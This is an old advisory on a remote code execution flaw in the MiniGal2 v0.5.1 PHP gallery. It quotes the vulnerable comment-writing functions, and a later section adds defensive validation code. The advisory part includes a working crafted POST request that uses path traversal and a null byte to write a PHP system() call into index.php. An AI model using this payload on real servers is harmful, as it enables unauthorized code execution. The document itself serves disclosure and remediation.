MG2 0.5.1 (filename) Remote Code Execution Vulnerability
Source: www.vfcocus.net Author: Alfons Luja Published: 2008-12-09
<?php 
/**********000000000000----------------------000\\\
/*-00--------++++++++++++++++++_______________)_)_________
-- --
   -    MiniGal2(MG2) v0.5.1 remote Code Injection    |
  ___     For my birthday I wish myself everything awesome
                 Always the other way round lol    '''''_---"
                    ___)()())0       ------------
     \                  A-L           |    """"""
      '--==9**        Victoria  heh      .
------       gr:SID.PSYCHO ;> and rest and ALL
       ---------++++++++++++=================))   
___ --             =======--
            ./..................
=======--////-
    VULN:[includes\mg2_functions.php]
    function writecomments($filename)  __LINE 555
  ---------
    function writecomments($filename) {
        $filename = "pictures/" . $filename;
        unset($buffer);
        if (count($this->comments) != 0) {
            for ($i=0; $i < count($this->comments); $i++){
                for ($j=0; $j < count($this->comments[$i]); $j++){
                    $buffer .= "*" . $this->comments[$i][$j];
                }
                $buffer .= "\n";
                $fd = fopen($filename,"w+");
                if (flock($fd, LOCK_EX)) { // do an exclusive lock
                    ftruncate($fd, 0);
                    fwrite($fd, $buffer);
                    flock($fd, LOCK_UN); // release the lock
                    fclose($fd);
                    $this->log("Wrote comment to '$filename'");
                } else {
                    $this->log("ERROR: Could not lock commentfile '$filename' for writing");
                    echo "MG2 ERROR: Could not lock $filename (function 'writecomments')";
                }
            }
        } else unlink($filename);
    }
         /\/\/\/\/\/\/\/\/\/\/\

    function addcomment() {
        $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
        $_REQUEST['input'] = $this->charfix($_REQUEST['input']);
        $_REQUEST['email'] = $this->charfix($_REQUEST['email']);
        $_REQUEST['name'] = $this->charfix($_REQUEST['name']);
        $_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
        $_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
        $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
        if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
            $this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
            $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
            $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
            $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
            if (count($comment_exists) == 0) {
                $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
                $this->writecomments($_REQUEST['filename'] . ".comment");
                .....etc //
................-------------------------------------------=====================
==== As you can see, the input data is not sufficiently filtered.
      We can write our own code into the file
      by sending a crafted POST request,
      e.g.:
      POST input=a&name=/ <?php system('dir'); ?> // &email=c&action=addcomment&filename=../index.php%00&id=5
      THE END
    
-------*/
// ALFONS LUJA just 4 fUn :P
?>
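
The checks that the quoted addcomment()/writecomments() path lacks, as an added example that is not part of the original advisory or of MG2's code. The helper names comment_path() and encode_field() are hypothetical, a flat gallery directory is assumed, and the sample inputs are constructed.

```php
<?php
// Added example, not MG2 code. comment_path() and encode_field() are
// hypothetical helpers; a flat gallery directory is assumed.

/** Map a client-supplied picture name to its comment file, or null. */
function comment_path(string $root, string $filename): ?string
{
    // Reject NUL bytes (the "%00" suffix truncation in the sample request).
    if (strpos($filename, "\0") !== false) {
        return null;
    }
    // Allow-list a bare image name: no separators, no leading dot.
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9_. -]{0,127}\.(?:jpe?g|png|gif)\z/i', $filename)) {
        return null;
    }
    // The picture must exist and resolve to a direct child of the gallery.
    $base = realpath($root);
    $picture = realpath($root . '/' . $filename);
    if ($base === false || $picture === false || dirname($picture) !== $base) {
        return null;
    }
    return $picture . '.comment';
}

/** Encode a field so it cannot add markup, PHP tags, "*" or a newline. */
function encode_field(string $value): string
{
    $value = str_replace(["\r", "\n", "\0"], ' ', $value);
    $value = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return str_replace('*', '&#42;', $value);
}

// Demo on a constructed temporary gallery holding one picture.
$root = sys_get_temp_dir() . '/mg2_demo_' . bin2hex(random_bytes(4));
mkdir($root);
touch($root . '/photo1.jpg');

// Constructed inputs; the second and third mirror the advisory's request.
foreach (["photo1.jpg", "../index.php\0", "../index.php", "a/../photo1.jpg"] as $name) {
    $path = comment_path($root, $name);
    printf("%-24s => %s\n", json_encode($name, JSON_UNESCAPED_SLASHES), $path ?? 'rejected');
}
echo encode_field("/ <?php system('dir'); ?> //"), "\n";

unlink($root . '/photo1.jpg');
rmdir($root);
```

Only the first input resolves to a comment file. The encoded name field comes out as inert text with the angle brackets and quotes escaped, so it cannot be parsed as PHP even if it is written to disk.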


 